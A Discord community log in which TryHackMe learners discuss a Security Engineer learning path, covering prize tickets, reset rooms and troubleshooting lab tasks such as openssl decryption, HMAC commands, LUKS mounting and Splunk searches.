#security-engineer-path

1 messages · Page 1 of 1 (latest)

latent wind
#

⚔️

woeful verge
#

lets get it going!

weak apex
#

hell yea!

oak sundial
#

This will be fun once I get off of work

strange pasture
#

How do you claim a prize with the 3 tickets of 1 thing?

oak sundial
strange pasture
lofty violet
#

!docs verify

spare shadowBOT
lofty violet
#

@strange pasture link your THM account with discord so you can post screenshots

strange pasture
#

Gotcha, its cause I got the Amazon one

lofty violet
scenic elbow
#

I am really liking the Identity and Access Management room, nice review from some Security+ content that I have kind of forgotten about over time

glossy swift
#

You have 30 seconds per question
Me, trapped underneath two cats, unable to reach the mouse 😆

lofty violet
cloud fern
#

can someone help me with this? I can't find IaaS filter anywhere

#

Nvm. Found it

river belfry
#

Hi, Found a bug on the lab on the first section. All questions were coming back wrong, went on private mode and the lab worked fine. I'm on Edge (Dont judge 🙃 )

hidden anvil
#

I have prob with this question:
What utility was used in the oldest event associated with "James"?

is there an issue? because no of utilities is work

woeful verge
#

Im looking for 1 hour

#

maybe more

hidden anvil
#

No

#

Not yet

woeful verge
#

waste of time brother

#

nobody can get third ticket

thorn rune
#

In the room Intro to Cryptopgraphy task 05 , cannot get the cmd sha256hmac to work on my VM or on the Attackbox, anyone know a work around?

upbeat plume
thorn rune
#

thanks, that worked. I had to download the repo "libgcrypt20-dev" as well and it worked

kind goblet
#

Introduction to DevSecOps task 7, the site just seems entirely broken for me? it's stuck on "next (5)" with the button grayed out even when I complete the question for the first comic

#

completed the questions for all 3 comics based on the little description of each in the task description, but ofc can't get the flag at all now

#

nothing is seemingly progressing the comics pages

onyx spindle
latent elbow
#

hello, does finishing the path mean that u get all the tickets?

onyx spindle
#

it is random which tickets you get

latent elbow
#

i got 2 laptop tickets

kind goblet
#

At least you can finish it lol. I don't think there's enough for free users to even get one of the basic prizes lmao

topaz echo
latent elbow
#

im pretty sure its rigged somehow, another user posted in general that she is finished and the tickets had a similar pattern

#

you get two high value tickets maybe to encourage those who have free accoutns to buy sub

#

its highly unlikely that is random

latent wind
kind goblet
#

mcdonald's monopoly system runs the same way. like 1 of each high value group is insanely rare compared to the other ones in the same group to make it feel like you're "so close" to getting it so you buy more

latent elbow
#

its too obvious to claim that it isn't that way

tawny yew
#

Who gives a f...rog about tickets, its about the learning process 🙄

kind goblet
latent elbow
tawny yew
latent elbow
#

at the end of the day i dont care i like pointing unethical business practices

scenic elbow
#

I don't think promotions are considered "unethical business practices" it is just good marketing and a fun event to take part in

latent elbow
#

"When you complete a room and draw a ticket, it's randomly chosen based on the prize's rarity rating."

#

they lied, give me an argument to defend lying ok go

latent wind
strong spade
strong spade
broken elbow
#

Hi 👋

bronze heron
#

Can someone explain the reasoning for the answers for the "Walking in Their Shoes" section of the "Security Engineer Intro"? I tried asking a couple security engineers what their answers would be since the correct answers didn't make sense to me, and they also answered differently to what the thing wanted so I have no clue what the reasoning is

vapid sentinel
late elbow
#

How much of this room is comprised of new content as opposed to content that’s just already been created and put into the path?

zinc heath
#

The security engineer path room is it free or I need to subscribe before accessing the room?.

hollow fern
#

In risk management room asset value is set to 0 . is this intended ?

#

.

strong spade
glossy swift
ember magnet
#

What utility was used in the oldest event associated with "James"?
stuck on this

#

i got the event but dont know what utility they mean

fallow prism
#

shouldn't this be a question? (windows hardening)

ember magnet
#

anyone?

limpid briar
raven wolfBOT
#

Gave +1 Rep to @hollow fern

ember magnet
#

found it

#

WMIC

latent wind
inner blade
#

Each person can only get one prize Win Prizes and Learn - 2023!, or how many?

inland anvil
shell matrix
#

these little minigames that restart on wrong answers are dismal

sweet trellis
#

mhm, im stuck on the zone-transfer game .. last task in the whole path .. gimme a real config and i make it work xD

worn snow
#

agreed, the zone transfer game is brutal

rugged narwhal
#

does anyone know why the 'hmac256' command works in the attackbox but not on parrotos? am I missing a library?

loud adder
#

Does the tickets thing actually work? On the main page no one claimed anything, that's pretty sus

latent wind
loud adder
lavish frigate
#

claim on demand!

latent wind
loud adder
latent wind
woeful verge
#

How can I win tickets? I'm already doing everything possible

#

I even sent an email about my blog post yesterday, but they didn't respond.

raven wolfBOT
#

Gave +1 Rep to @latent wind

loud adder
#

the video and blogpost are manual, could take a few more days

woeful verge
#

okay

fallow prism
#

Reaching the end here slowly, really liked 90% of the info in the path. Nice release.

last narwhal
#

Hi guys, I've been stuck trying to understand how to proceed with this code: (HINT) sudo cryptsetup open --type luks secretvault.img myvault && sudo mount /dev/mapper/myvault myvault/ BUT I wrote: sudo cryptsetup open --type luks secretvault.img myvault && sudo mount dev/mapper/home/tryhackme/secretvault.img myvault/
and it doesn't even works 😢 "Device secretvault.img doesn't exist or access denied." not sure if is a bug or im doing this wrong

harsh ruin
#

/ missing infront of your def?

#

also try to put code and things in `here`

last narwhal
#

maybe, let me try that now 🙂

broken lance
#

Hi, is someone know what they mean by saying "utility" ? There is nothing linked to Splunk called "utility", I don't really know what I'm supposed searching...

Room : Logging for Accountability

harsh ruin
last narwhal
harsh ruin
#

just making sure :D

last narwhal
last narwhal
broken lance
raven wolfBOT
#

Gave +1 Rep to @last narwhal

last narwhal
sage locust
#

any understands task 5 in Secure Network Architecture?

last narwhal
#

I'm in track 3 of Linux Systems Hardening, how can I switch from root@attackbox#to user@TryHackMe$?

loud adder
stark storm
#

any one else having issues with the kubernetes task on the Virtualization and Containers one? It's like it's not spinning up correctly after I click the start machine. I can login to the machine just fine, but running the suggested commands in the hints give errors. I've also given it 10-15 min (much more than the suggested 3-5)

#

Unable to connect to the server: dial tcp 192.168.49.2:8443: connect: no route to host

rugged narwhal
latent wind
loud adder
latent wind
pale relic
#

Lets Gooo!! 🥳 🥳 🥳

glass sparrow
wispy basin
glass sparrow
#

mersi))

chrome abyss
#

I'm at the ISO/IEC 19249, under encapsulation, don't they mean functional programming here, not OOP? I could be wrong, just checking my understanding of functional programming vs OOP

"Encapsulation: In object-oriented programming (OOP), we hide low-level implementations and prevent direct manipulation of the data in an object by providing specific methods for that purpose. For example, if you have a clock object, you would provide a method increment() instead of giving the user direct access to the seconds variable."

hollow crest
#

Finished the path, got the security warrior and both streak freeze prizes. Got 2/3 on all of the rest.
Anyone got anything besides this ones? Just wondering 🤔

glass sparrow
#

yes, i am got 5$ swag vaucher and 1 month premium

hollow crest
wispy basin
#

Profile > public profile > tickets

woeful verge
#

I'd like to know how we can get the tickets for rooms that were already completed prior to this path being set up...

glass sparrow
#

just reset progress and fill answers from begining

exotic gale
woeful verge
#

I can't do this challenge at all, the site always keeps closing for me, I've tried changing PC, browser, everything but it doesn't work

#

is the Putting It All Together of risk management

#

Does anyone have a writeup or would it be possible to send me the flag?

fallow prism
fallow prism
woeful verge
#

I am, can you show me your screen and I'll tell you what?

fallow prism
#

what do you want me to show you??

stone abyss
vale meadow
#

just finished it

little prawn
#

hey guys
i am on this new security engineer path and when i finished one of the walkthrougs, a window poped up to give me 2 tickets but i closed it before redeeming them, how can i show that window again?

vale meadow
#

you can see your tickets in "public profile" area

#

where you can look at badges

little prawn
#

yes but I cant find the last 2 I won

vale meadow
#

they'll show up in the tickets area. AFAIK you cant view which specific two you got from the room

little prawn
#

No I didnt get 2 At all

#

i had 4 before completing and they are still 4

#

looks like I had to reset progress haha

#

and it worked

broken elbow
little prawn
#

ty ty it worked

scenic elbow
#

Welp, I'm calling it a night with 7 rooms left, hoping to finish it up tomorrow, learned a ton so far though

gray smelt
#

Guys, can I redeem as many prizes as I want?

broken elbow
rugged fern
#

it will be ok to start Sec Engineer im rn doing JR pen , or ill not be able to finish it ?
any recommendations on which foundation should i imporve my self ?

hearty vortex
carmine dagger
#

need help having this error: on Task 2 of Introduction to Cryptography

dark rock
vale meadow
#

^

carmine dagger
copper aspen
#

The only thing I cannot complete is task 6 Threat Modelling, not sure what to do.I have 99% of the course and I cannot go further because of this simple task I cannot complete....🥹

carmine dagger
raven wolfBOT
#

Gave +1 Rep to @dark rock

woeful verge
#

I finished all the rooms in the new path, but I still couldn't get a ticket for any prize, and now, how can I still have a chance of winning something?

empty sapphire
#

I brought a premium sub after going through some rooms on the sec eng path, as I did the rooms can I still avail the tickets being a subscriber?

topaz echo
#

So if you claimed one ticket you won't get another ticket but if you completed the room before the path launched and haven't claimed ticket you can reset the room and claim tickets

#

I have a voucher for THM baseball cap. If someone buys a 1 month premium voucher for me. I would love to exchange baseball cap voucher for one month premium voucher 🙏🏼

#

Dm if interested

formal marsh
#

Room: cryptography
Task 2

my code:
openssl aes-256-cbc -pbkdf2 -iter 10000 -d -in quote02 -out q2.txt

but get the error,

digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:

#

i entered the key as shown

#

should i just return after this contest? the platform is very busy so i assume help will be available then

broken crescent
#

shouldn't the discoverability chart in task5 of the threat modelling room be the other way around?

#

as of know being harder to detect lowers the overall score

#

no wait, i misunderstood the meaning of it

#

i mistook the intention to be defender tools like malware scans and not vuln scans

#

i'll leave the comment in case someone else makes the same mistake

woeful verge
#

for the room: Identity and Access Management
Task 4, near the bottom (above the answers) the line reads as follows:

In iterate, 2FA requires two authentication mechanisms, and it falls under the more general MFA, which requires two or more authentication factors. This requirement can significantly improve security and protect against various attacks, such as those that take advantage of weak passwords.

Should it not be: To reiterate instead?

woeful verge
formal marsh
raven wolfBOT
#

Gave +1 Rep to @rose otter

formal marsh
#

openssl aes-256-cbc -d -in quote02 -out q2.txt opens quote02 file ✅

rigid spruce
#

prizes gone?

woeful verge
woeful verge
#

Governance & Regulation
Task 6
Under the sub-section: Developing and Implementing NIST 800-53 based Information Security Program

There should be an s after control:
Among all the families, "Program Management" is one of the crucial control of the NIST 800-53 framework.

toxic birch
#

I'm having trouble doing the symmetric key problems. I am using the Attack Box but either get a "bad decrypt" error or a "deprecated key derivation" error. I tried updating the packages and it still isn't working.

#
enter aes-256-cbc decryption password:
bad decrypt
140038737277376:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:
root@:~/Rooms/cryptographyintro/task02# openssl aes-256-cbc -d -in quote02 -out quote.txt
enter aes-256-cbc decryption password:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.```
gilded coyote
toxic birch
#

Wow

#

Thanks a bunch. I can't believe I didn't just try opening it anyway

gilded coyote
toxic birch
#

Haha at least I'm not the only one!

bleak nimbus
#

Hi everyone.
In the Linux Hardening room we have this question.

We cannot attach external storage to the VM, so we have created a /home/tryhackme/secretvault.img file instead. It is encrypted with the password 2N9EdZYNkszEE3Ad. To access it, you need to open it using cryptsetup and then mount it to an empty directory, such as myvault. What is the flag in the secret vault?

But there are no any /tryhackme/secretvault.img file in attached VM

shy summit
#

did you ssh?

bleak nimbus
#

no. I'm just running an attack Box

lone ivy
#

Is this path for free subscribers also?

#

I was going through the path and every room was available up until now when I reached Identitiy and Access management...

woeful verge
lone ivy
woeful verge
lone ivy
#

I am opening a support ticket... 🙂

woeful verge
outer wing
bleak nimbus
raven wolfBOT
#

Gave +1 Rep to @outer wing

outer wing
amber zephyr
#

Dam it's gone subscriber only for most of the rooms it seems, the promo made it seem like it was for both free tier and subscriber, but you get more prize entries as a subscriber?

amber zephyr
#

I guess that's that then 😞

quaint dome
#

Anyone encountered this when attempting Task 6 of Network Device Hardening room? It takes forever for the OpenWrt Firewall Status page to load...

honest lava
#

yeah, it took some time for myself aswell, i had time to make coffee meanwhile 🤓

rustic vector
#

Did anyone receive rare tickets?

rigid spruce
#

did anyone receive any rare tickets? (all three)

rigid spruce
steady idol
#

I am also stuck on linux hardening. I will try ssh'ing from the attack box.

Also for the rare tickets. I have recieve 2/3 for laptop. That would be sick if i land that 3rd one, but for now i am assuming its like mcdonalds monopoly and that last piece is impossible haha

honest lava
rigid spruce
#

I wonder if they're still there

#

man, I'm a security warrior, do me blue 😭

scenic elbow
civic sable
#

Wait no one has won laptops so far ?

#

I have 2/3 ticket for laptop

scenic elbow
#

I think one guy did

errant bane
toxic birch
errant bane
bleak nimbus
#

Hi everyone.
Can you please help me, cause I'm stuck here
In the Linux Hardening section we have Firewall topic and there are a question like this.

What is the allowed UDP port?
I try to do UDP scan but it doesn't work

marble creek
#

for Governance and Regulation - task 8 exercise the timer doesn't start if you do the tutorial

marble creek
#

for Threat Modelling, task 6 and task 7 exercises timers start immediately, I think they should start after the user clicks continue

lavish frigate
#

is there an update on claimed prizes?

latent wind
harsh marsh
#

My completed rooms in this path reseted themselves randomly

woeful verge
#

getting a bit lost on the task2 of the cryptography room. any hints por favor?

#

tried adding the cipher algo to see if that wouldve worked by specifying it

last narwhal
#

So I finished Managing Incidents and Network and System Security few days ago and I just noticed some of those progress have been deleted 😮

last narwhal
last narwhal
sinful cosmos
#

Same as. Everything I did this week has been reset, and at the end says 'tickets already awarded'

thorny pond
#

up

steady idol
#

oh it doesnt give tickets again? then im not doing it hah

brave cove
#

Same here. Everything I did this week has been reset,…

timid bramble
hollow fern
#

some of my room got resetted. One of them i really hated now i need to do it againparadox

edit: only 1 room got reset. another is new addition in this path IG. (Traverse)

mental remnant
#

lo

lavish frigate
#

twice now Secure Network Architecture has reset to not completed fyi

frank grail
#

Same here, all managing incidents was reset for me.oof

woeful verge
#

Same, Secure Network Architecture has reset for me as well

woeful verge
latent wind
last narwhal
strong steeple
#

I had completed the whole "Managing Incidents" block and now it shows as completed untouched and incomplete. Not glad this happened to you all too, but selfishly I am glad it seems to not just be affecting me

last narwhal
strong steeple
last narwhal
strong steeple
# last narwhal it's a waste of time and money tbh

I get how frustrating things like this can be, but I like THM. Not to sound like an ad but I find it the best way for me to learn (I have bad ADHD) and for as much content there is think the monthly fee is well worth it to me. While I like the platform a lot I can definitely see how other folks can feel differently though

hot tinsel
#

-f

#

I'm doing the Windows Hardening Task 6 and stuck trying to figure out how many characters does the Bitlocker recovery key have in the attached VM question. I've got the character number for the key in the text file but it says it's wrong. What am I missing?

sage orchid
#

@hot tinsel I beleive the Bitlocker recovery keys have a standard length, looking at Microsoft support docs for Bitlocker would point you in the right direction

woeful verge
#

hi all

untold lynx
#

I think most people are receiving these, right?

#

I have only finished 6% of the course.

#

😅 SUS

wet surge
#

Does someone finish the room cryptographyintro ? I had a problem with one question and I am wondering if it’s not a problem from TryHackMe itself. I am pretty sure about the answer but it doesn’t work !!!

#

Hello please help

#

Task 4 question 2 : the prime number’s last byte

#

Did someone finish this room to confirm me that everything’s is correct.

wet surge
sweet charm
untold lynx
untold lynx
untold lynx
wet surge
#

I dis the first question. And it’s exactly similar to what I did for the previous question. I don’t know why here it doesn’t work.

untold lynx
#

of course you need to read the correct filename in the question

alpine pewter
hot tinsel
raven wolfBOT
#

Gave +1 Rep to @sage orchid

jade jetty
#

Why is the tickets so bad

#

Like I have gotten the same 2 tickets Ive redeemed for like 8+ rooms

onyx spindle
#

there are thousands of people who are participating, your chances of winning big prizes are slim but still there

sweet charm
#

Every example in thm is in ubuntu user but when I ssh into my machine it's only tryhackme user and I can't switch ubuntu user thus I don't have sudo as well .

#

Any help

sweet charm
#

I'm experienced with linux btw

fair orchid
sweet charm
#

Yeah but examples are in sudo user and it wants me to check the /var/log and I can't do it with tryhackme user

#

oh wait sorry

#

1 file is owned by my user

fair orchid
#

You can, you're checking the wrong log.

sweet charm
#

Yeah you are right nvm

#

one of the files are owned by my user didn't realize that damn looking at it for 15 mins 😄

formal marsh
#

the sha256hmac is still not working in Cryptography Intro room task 5. Can only use the hmac256 method

broken crescent
#

windows hardening room

#

🤨

heady echo
#

wait you are telling shadow you don't game with flash player games???

broken crescent
#

they don't work on my netscape communicator 😦

#

(not even sure if that's true)

quasi portal
#

I am having a heck of a time with the second task - I keep getting this (both on the tryhackmebox and my own computer), but the command to use doesn't have a place to put a key. Tried a bunch of other things, like cyber chef, but it says the hex code version of the key isn't long enough

#

figured it out.

woeful verge
#

Thank you TryHackMe for this learning path 😁😁😁💙💙💙

I love it, some of my favorites are the app Sec rooms, Dev and Secure Coding, and Threat Modelling.... but the entire path is legit 💪💪💪💪

Keep up the awesome work and producing wonderful content, looking forward to what else y'all release

rough plank
#

Logged in this morning to discover 5 rooms that i completed with reset progress... dafuq

chrome lily
#

Same my "Secure Network Architecture" and whole module Managing incidents was reset, fixed some of them but i do not get the tickets so will wait to see if it fixes itself, i do not like to not have 100% completion 🙂

wispy sundial
#

does any one have clue for quote02

#

task 02

#

stuck at openssl

#

openssl aes-256-cbc -d -in quote02 -out q2.txt -iter 10000
enter aes-256-cbc decryption password:
bad decrypt
139936534548928:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:564:

#

can any one help what was wrong in it

mental remnant
#

try it without iter

forest ingot
#

I experienced a similar issue. Don't recall the exact fix (because I didn't take notes facepalm ).
Try messing with the syntax. Use a different variation of similar/equivalent options.

#

I surfed the web a bit and referenced the man pages; was able to successfully decrypt without much trouble.

zenith locust
mental remnant
#

Well I finished the Path

#

it was pretty cool

#

too bad i didnt get any prizes

wispy sundial
#

any one know mother's secret hints

#

finished all except this room

#

but haven't got any vocher

#

even if I finish this will get 2 so nothing I get even steaks

midnight tusk
wispy sundial
#

didn't understand

#

guessing means

#

it accepts right answers only right

midnight tusk
#

if you're talking about the same room, you need to guess the answer to the security question to reset the password

#

so pick the question with limited answers

woeful verge
#

lol i'm enjoying this path, it's funny everyone complains about not winning the prizes though. That's not really the point of it

woeful verge
#

why does my jwt cookie not work in the Cookies4all app? It decodes properly from what I can tell.

wise mulch
woeful verge
#

ohhh. I added a period in based on where the cursor was in cyberchef lol. it looked like it was decoding properly.

wise mulch
#

hope that helps!

woeful verge
#

no dice idk where i'm going wrong here.

#

got it

#

I think it was moreso an issue with hasty copy/pasting from AttackBox clipboard

#

thanks @wise mulch !

raven wolfBOT
#

Gave +1 Rep to @wise mulch

woeful verge
#

that was the hardest part of the whole challenge 😅 repeatedly have to remind myself to slow down and think.

wise mulch
#

yea, i do the copy/paste mishap a lot lol

woeful verge
#

it's a rush to get any sort of flag that is slightly difficult lol. idk if it's the adhd or what.

wispy sundial
woeful verge
midnight tusk
#

I still have 9 rooms left and I'm powering through

wispy sundial
woeful verge
wispy sundial
woeful verge
jagged cliff
#

Guys, i had 2 rooms that reset on their own, did it happen to anyone else ?

#

I had already finished them

#

The secure network architecture and logging for accountability rooms

hollow crest
broken crescent
#

The Link to the Coso Framework in the auditing room leads to a 404

fair orchid
raven wolfBOT
#

Gave +1 Rep to @broken crescent

glossy terrace
#

Anyone else have the Secure Network Architecture room reset on them?

#

Oh, i just saw above someone mention it as well.

placid comet
#

wow, finally I have completed Security Energy learning path 🔥

dark hollow
#

I am in the LinuxSystemHardening room. There is supposed to be a file called /home/tryhackme/secretvault.img. It's not there.

woeful verge
#

I think I had a similar issue, it's in a different directory i think

dark hollow
#

I also tried some of the later tasks in that room and it seems like I have the wrong VM.

#

I am using the attackbox. Should I be doing something else?

unique hare
woeful verge
dark hollow
#

I can't. I can't find the password for it.

woeful verge
#

it's in the intro

#

you can ssh into it from AttackBox or the VPN

dark hollow
raven wolfBOT
#

Gave +1 Rep to @bright gulch

woeful verge
#

glad to help!

woeful verge
#

Lol Authorisation-Token threw me off. It had to be Authorization-Token

glad trench
#

Has anyone completed the LP?

woeful verge
#

quite a few people

midnight tusk
woeful verge
#

the ship is too fast lmao I can't read the options

upbeat plume
#

Did other people also experience that some Rooms got reset in this LP?

upbeat plume
#

huh wierd

midnight tusk
#

My burp suite module got reset though

upbeat plume
#

yeah i know that happens sometimes when the rework a question or change something in the room and you have to reawnser the (new) question, but this is the first time that the complete rooms were reset which is rather annoying

#

like 4 rooms got reset for me

fair orchid
midnight tusk
raven wolfBOT
#

Gave +1 Rep to @fair orchid

woeful verge
#

So did the Secure Network Architecture room get updated too? That is the one that seems to be resetting and I haven't seen anyone acknowledge why lol

charred phoenix
#

"Although an eavesdropper has learned the values of q, g, A, and B, they won’t be able to calculate the secret key that Alice and Bob have exchanged.", it's not exactly wrong but an attacker in the middle could make a connection to both alice and bob and they wouldn't know, DH needs some sort of certificate like in https to really be secure

#

I guess they're only considering a situation where someone can read the date being transmitted, in that case it would be safe and it does make it easier to understand

#

nvm, just got to the end of it and it literally mentions what I just said

#

should've read it until the end before saying somethingkekw

rigid whale
#

that whole cryptography room was way too detailed where it tried to break down how each method worked with analogy

#

just super confusing scenarios they wanted you to try and follow with variables lol

#

the point of "walking the dog" when teaching is to make something easier to understand and i got more confused the more i read haha

blissful solstice
#

how do we get security warrior role

sour ivy
blissful solstice
#

oh i gotta finish the whole course?

#

I ain't got premium so maybe I can't even if I wanted to

sour ivy
#

its random, you'll probably get it pretty early tho

blissful solstice
raven wolfBOT
#

Gave +1 Rep to @sour ivy

blissful solstice
#

I suppose role is gonna delete anyways so just gonna go for some prizes

fair orchid
#

It will.

upper swan
#

any one has won any prize so far ?? I am getting the same tickets over and over

woeful verge
#

i thought prizes weren't announced till the end

upper swan
#

You can go to your public profile and then click on the tab 'Ticket' there you will se what you have won so far

woeful verge
#

I believe that shows you what you have tickets for, not necessarily that you won. (edit: depends on the item)

#

For the laptop, if you get 3 tickets, I think you are entered and possibly win a laptop.

#

Most of the prizes you can claim automatically. However, email us at tickets@tryhackme.com if you've won the Amazon Voucher, Laptop, or certification voucher. Make sure to include your TryHackMe username in the email, and use the prize name in the email title (for example, if you win an Amazon Voucher, include "Amazon Voucher" in the email title). As some of the larger prizes and entries are manual, we will get back to you by mid-October to verify.

upper swan
#

ok cool

#

thanks

dire walrus
#

fyi, i've completed several of the rooms in this path and had the redeem ticket pop up. Instead of clicking on the ticket itself I clicked on the "View" button directly under the ticket and the pop up dissapears and I never got them 😦 big sad. Thats happened to me twice because I fat fingered it

cyan forum
#

If I'm not finding an answer where I think there should be one, am I allowed to ask for help or does that defeat the purpose of the room?

rigid whale
#

lol ive had tickets disappear overnight

cyan forum
#

I have no clue what I'm doing wrong but the result of a command in the Intro to Cryptography" room (Diffie Hellmen task) is giving errors.

upbeat plume
cyan forum
#

Thanks

upbeat plume
rigid spruce
#

who's winning what

woeful verge
#

I am stuck on Mothers Secret any hints? Been using postman to try to hit the API routes but I'm not sure what i'm missing

upbeat plume
woeful verge
#

yeah this one has me feeling dumb. i see three routes

#

i'll keep working on it

#

attackbox died in the middle of it ugh

final dome
#

Anyone figure out the last Going the Extra Mile challenge in the OWASP room? It's a bonus with no flag. Question: ||There's a way to use SSRF to gain access to the site's admin area. Can you find it? ||

heady echo
#

oooh server side request forgery

final dome
#

I feel like it should be pretty straightforward but no luck yet

woeful verge
#

oh nevermind

#

that was fun

woeful verge
#

never fails, asking for help is my rubber duck! gonna take a break and then finish off the IR rooms and I'm done with the pathway. Oh, i'll have to go back and redo the Secure Network Architecture but I'm saving that for last lol

stark storm
#

woohoo, just finished this path 😄

woeful verge
#

woo, finished too

stark storm
#

@woeful verge congrats

woeful verge
#

thanks you too!

amber zephyr
#

Intro to Cloud Security module doesn't feel as well written as the previous modules

frozen charm
#

Hello everyone!
Today i noticed that i lost a few tickets related to this path! Did this happen to anyone else?

cyan forum
#

I'm on the Intro to Cryptography room and apparently I have to downoad hmac or something? Does anyone know how I can do that? I tried with sudo apt-get but it says it's missing files and doesn't work.

heady echo
cyan forum
#

not yet. I'll do that. Thank you for responding

#

it said some index files were ignored or old ones used instead

cyan forum
#

if it's saying the repo isn't updated, is that something I can take action on or am i just stuck here?

#

Also apparently sha256hmac doesn't exist? It's not even saying "you can get it here if you download this" like it did with the first one.

reef crescent
#

Don't download that just run
openssl dgst -sha256 -hmac ----------

fair orchid
#

^ I was looking for that exact command.

cyan forum
#

so it'd be ||openssl dgst -sha256 -hmac order.txt and then the key?||

reef crescent
#

Got u bro 😂

#

Yepp u got it ...

#

We are here... try and come back to let me know

cyan forum
#

IT WORKED

#

Thank you so much!

reef crescent
#

Happy to help

agile swallow
#

How do you guys like the path so far? Does it also teach you how to deploy apps and maintain them etc?

bold root
#

also wondering how you guys are liking the path. I am currently doing jr pentester path

bronze heron
#

I'm only 60% through it, but its got some severe issues with polish. Minor things like misspellings, but also several questions where I've had to give up and check the forums only to find that the reason I'm not getting something right is because the lesson itself is wrong (ie. A view site problem expecting an obviously wrong answer). It also is very heavy in what I'll call "white collar speak" and if it weren't for my experience as a software engineer I'm confident I wouldn't understand a lot of it and worse, would misunderstand and think I understand (ie. Terminology such as "stakeholders").

There's also been a few times I've consulted security engineers I know over segments I didn't quite understand the rationale about and they were very opinionated against the content, but their ramblings went over my head so I don't remember them.

I'm new to tryhackme overall and I am overall impressed with the platform, but I probably would have waited to continue with this path if I weren't being bribed with the ticket system.

As for deploying apps, based on the titles of the rooms I haven't completed yet I'll say no. Deploying/maintaining is more devops-y than security engineer imo, but tech titles have vague borders especially with tech companies trying to squeeze more responsibilities into their workers, so emphasis on it being just my opinion.

amber zephyr
#

Any updates on what prizes are left?

zealous crescent
#

You can still get the tickets

fair orchid
fair orchid
zealous crescent
#

There are still all prizes left

#

It's a giveaway and you can only participate if you have the 3 tickets

#

The giveaway will occur when the event ends

fair orchid
#

It won't be until mid October.

#

Staff will need to verify prize winners.

agile swallow
#

Title’s definitely have varying responsibilities I agree

zealous crescent
amber zephyr
#

You don't know that though :/

fair orchid
#

When the red teamer event was here, it was updated daily, if not every few days, and it was E-mail FCFS basis.

amber zephyr
#

I can't read fast enough for this secure space lifecycle 😄

#

Managed it 😂

woeful verge
hot tinsel
#

When I load my Splunk instance it's "suppose" to have a dataset already loaded but when I look at the instance it appears to be empty. I can import / add a new dataset but that's wrong. Any suggestions? I'm also in the Splunk Basics room but it's not helping me figure out if a dataset it loaded / how to read

bronze heron
#

It's not in-depth with any of these platforms, more of a way to get you more aware of them, but if entry level security engineer expectations are anything like entry level software engineer requirements I suspect that's fine

muted bane
final dome
#

I'm loving the DAST room. ZAP's integrated browser is a nice touch that wasn't a thing the last time I played around with web proxies

#

Or I had no idea it was a feature notsure

hot tinsel
raven wolfBOT
#

Gave +1 Rep to @muted bane

wintry jewel
#

has anyone had issues with not receiving tickets after completing rooms?

bold root
#

ugh the crypto room is super long

bold root
#

are the tickets given at random or certain rooms give certain tickets?

scenic elbow
#

It is completely random

meager wave
#

Hey there! Just checking if anyone has** not** had their progress reset in the managing incidents module?

fair orchid
meager wave
raven wolfBOT
#

Gave +1 Rep to @fair orchid

bold root
#

For the IR room Splunk it asks how many incidents for James but expects a single number… I’m seeing a double digit figure

scenic elbow
scenic elbow
#

Try User="Cybertees\James", or you can just click on the users on the left side and click his name

amber zephyr
#

Anyone do the Incident Lifecycle Game first go?

#

I might never get it 😄

hot tinsel
amber zephyr
#

I’ve taken a break, but might have to do the same 😂

hot tinsel
#

VICTORY, got my certificate 😄

primal gale
#

Folks, feeling foolish here - in the Governance & Regulation room - under task 6. The last two questions are stumping me. "Per NIST 800-53, in which control category does the incident response lie?" that appears self-evident to me - but the answer seems to not accept the actual control family it is in. The next one "Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?" has me driven demented... Any pointers would be greatly appreciated

heady echo
#

as the pictures layout the answers to that task

primal gale
#

thanks @heady echo - I'll try that again - as reading the NIST documentation is not helping me...

raven wolfBOT
#

Gave +1 Rep to @heady echo

heady echo
#

yeah the documentation is not gonna help you answer said questions at all

#

which was really confusing for shadow but eh you learn

primal gale
#

one done... now the last one

#

done - that took way too long - thanks again @heady echo for the very helpful nudge

heady echo
#

you're welcome

amber zephyr
#

No t-shirt for me, enjoyed it though 🙂

amber zephyr
#

Nearly there 🙂

agile swallow
#

Yep. Not gonna lie guys, kinda underwhelming material.

thin meadow
#

My progress was reset for the Network Device Hardening room twice! I am just not feeling like re-doing it it for the third time now..

pastel elk
#

guys, in linux system hardening there is no file in task3 called secretvault.img...am i supposed to create one?

#

nvm i am an idiot

steel crescent
#

Has anyone scored any SWAG yet? 🙂

cobalt gull
#

just finished the path. It was a lot of fun. I came close to winning some big tickets, had a bunch of items where I was just waiting for the last ticket

thorny edge
#

Hello

#

,in this room I get an error in pods "Virtualization and Containers"

#

This is error message "E0923 16:03:37.820772 1601 memcache.go:265] couldn't get current server API group list: Get "https://192.168.49.2:8443/api?timeout=32s": dial tcp 192.168.49.2:8443: connect: no route to host" @uncut crest

fair orchid
#

YAY for not tagging everyone.

thorny edge
#

what is YAY?

fair orchid
#

It's a celebration

thorny edge
#

Do I have to wait or report? @fair orchid

steel crescent
#

I'm about 75% finished and have Security Warrior, & both Streak Freezes. Hoping for a sweet THM Hat 🎩

neat thorn
#

i just claimed the 1-day streak freeze and then the 7-day streak freeze.. it now says i have the 7-day streak freeze equipped.. should i have waited until i was ready to use them to redeem them?

vagrant spindle
#

I've deployed the Window's hardening box but I can't connect to it? I've restarted the box, checked connection, tried rdp, ping, ssh not sure what the issue is

bold root
#

are we able to claim multiple prizes?

scenic elbow
#

Yes

long turtle
tepid widget
#

Can anyone help me understand how to obtain the DAST ZAP final answer? I can't seem to get it for the life of me.

tepid widget
#

Never mind. I got it.

reef crescent
#

Just finished the path... feeling great 😎

tender meteor
neat thorn
sweet charm
#

I probably have hours left for my premium to end and I just need 1 more ticket for the monthly premium voucher, praying thm gods....

reef crescent
reef crescent
sweet charm
#

if theres only 3 laptops to be given with the last event why am i still getting laptop tickets?

fair orchid
woeful mantle
#

just wanted to mention, that in the room 'cryptographyinfo' task 7, when you let the MS screen reader (using latest Edge) play on the tables, it creates an empy column when jumping between entries, making it a 3x3 table from the 3x2 original. Not yet a well established hacker, but I think you could exploit this, no?

bold root
#

anyone have trouble loading the vulnerability management exercise?

plucky current
#

Eh, 83% through this path and trying to actually drive more information in(some of it's major review from classes and ISC2) and all I've won are the streaks and a title. Good luck to the rest and glad for those who worked hard and won their prizes as this finishes out tomorrow!

bold root
#

i have 2 tickets for lap top and 2 rooms left but no way i can finish by tommarow

#

